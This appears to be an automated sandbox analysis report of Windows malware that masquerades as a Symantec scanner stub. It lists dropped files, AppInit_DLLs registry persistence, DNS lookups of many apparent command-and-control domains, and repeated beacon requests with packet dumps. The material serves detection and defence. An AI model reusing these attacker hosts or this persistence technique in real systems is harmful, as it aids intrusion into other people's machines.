Analysis Date2014-10-26 01:03:22
MD5e9209255cce176205be8470974b7aec2
SHA14344c3f23eb4b80da90b1642b2f01b9c36e82f55

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c76832309cfc18a514689f343c29931c sha1: f3f8f92bd021009996356074df2632386861a83f size: 27648
Section.rdata md5: 60afc5d2f950acbec0dcd0c6efeba4e9 sha1: 222b954e7d8a833483bf0637e17e2c60d2cbaa42 size: 7680
Section.data md5: d31155f63c8c4ed2c30ca9511b83fe58 sha1: 2180da69c1448c39f5704a8bd03698826f843d83 size: 5120
Section.rsrc md5: 0c5b9fbe5329a0d5ac51ed6692012139 sha1: 6c47ca3871e65dd04610b59edad73775a5220a36 size: 299008
Timestamp2012-10-20 10:19:20
VersionLegalCopyright: Copyright © 2012 Symantec Corporation. All rights reserved.
InternalName: Navwnt
FileVersion: 19.8.0.14
CompanyName: Symantec Corporation
Product Date: 07/26/2012
ProductName: Symantec Shared Component
ProductVersion: 19.8
FileDescription: Symantec Shared Component Scanner Stub
OriginalFilename: Navwnt.exe
PackerMicrosoft Visual C++ ?.?
PEhash5d2618f413e1bc373eac0dbd465f0255a9181601
IMPhash2f39e4291325430fedd220b7e4610838

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Creates FileC:\WINDOWS\system32\fnztsch.dll
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSdetoxist.com
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSnetrovad.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\fnztsch.dll\\x00

Network Details:

DNSdetoxist.com
Type: A
141.8.225.80
DNSdebijonda.com
Type: A
141.8.225.80
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
141.8.225.80
DNSvornedix.com
Type: A
141.8.225.80
DNSdentagod.com
Type: A
141.8.225.80
DNSliteworns.com
Type: A
141.8.225.80
DNSvengibit.com
Type: A
141.8.225.80
DNStryangets.com
Type: A
141.8.225.80
DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
141.8.225.80
DNSfescheck.com
Type: A
141.8.225.80
DNSinzavora.com
Type: A
141.8.225.80
DNSgetinball.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QePt8vo0n/rd
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QaELeQaX51YV
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTFVH603cTE6
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTFVH603cTE6
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1Qd05PA4KE3ns
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1Qd05PA4KE3ns
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTG0ZZMyDjR6
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QYbXvRVvNgFW
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTH19ufphf5f
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QXuley1FKA99
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTAb9SydVzVR
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1042 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1043 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1044 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1045 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31516550 7438766f 306e2f72 64204854   1QePt8vo0n/rd HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31516145 4c655161 58353159 56204854   1QaELeQaX51YV HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515446 56483630 33635445 36204854   1QTFVH603cTE6 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515446 56483630 33635445 36204854   1QTFVH603cTE6 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31516430 35504134 4b45336e 73204854   1Qd05PA4KE3ns HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31516430 35504134 4b45336e 73204854   1Qd05PA4KE3ns HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515447 305a5a4d 79446a52 36204854   1QTG0ZZMyDjR6 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515139 6a2f7368 69686e6a 39204854   1QQ9j/shihnj9 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515139 6a2f7368 69686e6a 39204854   1QQ9j/shihnj9 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515139 6a2f7368 69686e6a 39204854   1QQ9j/shihnj9 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515962 58765256 764e6746 57204854   1QYbXvRVvNgFW HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515448 31397566 70686635 66204854   1QTH19ufphf5f HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515875 6c657931 464b4139 39204854   1QXuley1FKA99 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
